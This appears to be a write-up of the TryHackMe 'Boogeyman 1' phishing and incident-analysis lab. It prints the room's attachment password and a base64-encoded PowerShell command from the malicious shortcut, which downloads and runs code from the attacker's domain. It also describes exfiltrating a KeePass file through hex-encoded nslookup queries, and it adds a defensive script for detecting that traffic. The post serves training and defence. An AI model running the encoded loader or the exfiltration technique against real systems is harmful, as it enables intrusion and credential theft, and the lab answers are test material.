Unveiling the Boogeyman: A Deep Dive into Threat Analysis
Chapter 1: Introduction to the Boogeyman Threat
A new threat actor has surfaced, adopting the moniker "Boogeyman." This persona raises concerns in the cybersecurity community. Are you prepared to face the Boogeyman?
In this section, we will explore the details of the incident.
Section 1.1: Key Information from the Attack
To begin our investigation, we must gather some crucial information. Here are the significant details regarding the phishing email involved:
- Sender's Email Address: [email protected]
- Victim's Email Address: [email protected]
- Third-Party Mail Relay Service: The service used by the attacker, as inferred from the DKIM-Signature and List-Unsubscribe headers, is elasticemail.
Subsection 1.1.1: Analyzing the Encrypted Attachment
Within the encrypted attachment, we find a file named Invoice_20230103.lnk. To access its contents, you'll need the following password: Invoice2023!.
Section 1.2: Payload and Domain Analysis
Next, we need to investigate the encoded payload found in the Command Line Arguments field that the lnkparse tool reports for the shortcut. The payload is:
aQBlAHgAIAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABuAGUAdAAuAHcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AZgBpAGwAZQBzAC4AYgBwAGEAawBjAGEAZgBpAG4AZwAuAHgAeQB6AC8AdQBwAGQAYQB0AGUAJwApAA==
For the attacker's file hosting and Command and Control (C2), the domains utilized are:
- cdn.bpakcaging.xyz
- files.bpakcaging.xyz
Chapter 2: Tools and Techniques Used by the Attacker
In our exploration, we note that the attacker downloaded an enumeration tool named Seatbelt. Additionally, the attacker accessed a file using the sq3.exe binary, located at:
C:\Users\j.westcott\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite
The software associated with this file is Microsoft Sticky Notes.
A second video expands upon this Boogeyman-1 TryHackMe walkthrough, detailing further insights and methodologies.
Continuing our analysis, we find that the exfiltrated file is named protected_data.kdbx, a KeePass database. The encoding method used during the exfiltration of sensitive data was hex, and the tool utilized for this exfiltration was nslookup.
As we delve deeper, we discover that the HTTP method employed by the C2 server for transmitting command outputs was POST, and the exfiltration protocol used was DNS.
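The hex-over-DNS exfiltration described above leaves a recognisable pattern in resolver logs: long, all-hex leftmost labels under the attacker's zone. The following is an added example (not code from the room or the original write-up) that flags such queries and reassembles the carried bytes; the query list and the "secret" bytes are constructed for the demo, and only the zone name comes from this page.

```python
import re
from typing import Dict, List, Tuple

# Zone used by the attacker's infrastructure, as named on this page.
ATTACKER_ZONE = "bpakcaging.xyz"

# A long label made only of hex digits is the tell-tale of hex-encoded data smuggled
# in DNS queries (what nslookup-driven exfiltration looks like in a resolver log).
HEX_LABEL_RE = re.compile(r"^[0-9a-fA-F]{16,63}$")

# Constructed sample: (source IP, queried name) pairs as a resolver would log them.
# SAMPLE_SECRET is made-up data standing in for a chunked protected_data.kdbx (the
# leading bytes mimic the KeePass 2 file signature); it is not data from the room.
# Each exfil query carries one 16-byte chunk, hex-encoded, as its leftmost label.
SAMPLE_SECRET = b"\x03\xd9\xa2\x9a\x67\xfb\x4b\xb5constructed kdbx bytes for the demo"
CHUNKS = [SAMPLE_SECRET[i:i + 16] for i in range(0, len(SAMPLE_SECRET), 16)]
SAMPLE_QUERIES: List[Tuple[str, str]] = [
    ("10.0.0.5", "www.example.com"),
    ("10.0.0.5", CHUNKS[0].hex() + "." + ATTACKER_ZONE),
    ("10.0.0.7", "time.windows.com"),
    ("10.0.0.5", CHUNKS[1].hex() + "." + ATTACKER_ZONE),
    ("10.0.0.5", "cdn." + ATTACKER_ZONE),  # C2 lookup, but no hex label
    ("10.0.0.5", CHUNKS[2].hex() + "." + ATTACKER_ZONE),
]


def hex_labels_for_zone(queries, zone) -> List[Tuple[str, str]]:
    """Return (src, hex_label) for queries under `zone` whose leftmost label looks like hex."""
    hits = []
    suffix = "." + zone.lower()
    for src, name in queries:
        if not name.lower().endswith(suffix):
            continue
        first_label = name[: -len(suffix)].split(".")[0]
        if HEX_LABEL_RE.match(first_label):
            hits.append((src, first_label))
    return hits


def reassemble(queries, zone) -> Dict[str, bytes]:
    """Join the hex labels per source host, in query order, and decode them back to bytes."""
    per_host: Dict[str, List[str]] = {}
    for src, label in hex_labels_for_zone(queries, zone):
        per_host.setdefault(src, []).append(label)
    out = {}
    for src, labels in per_host.items():
        joined = "".join(labels)
        # A dangling odd nibble (truncated capture) is dropped instead of raising.
        out[src] = bytes.fromhex(joined[: len(joined) - (len(joined) % 2)])
    return out


if __name__ == "__main__":
    for src, data in reassemble(SAMPLE_QUERIES, ATTACKER_ZONE).items():
        print(f"{src}: recovered {len(data)} bytes, header {data[:8].hex()}")
```

On a real capture the same logic runs over the `dns.qry.name` column exported from Wireshark, filtered to the attacker's zone.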
In summary, the password for the exfiltrated file can be decoded from the TCP stream, while the credit card number stored within it is identified through specific Wireshark queries.
That's all for now! Thank you for joining us in this detailed exploration. See you in the next room!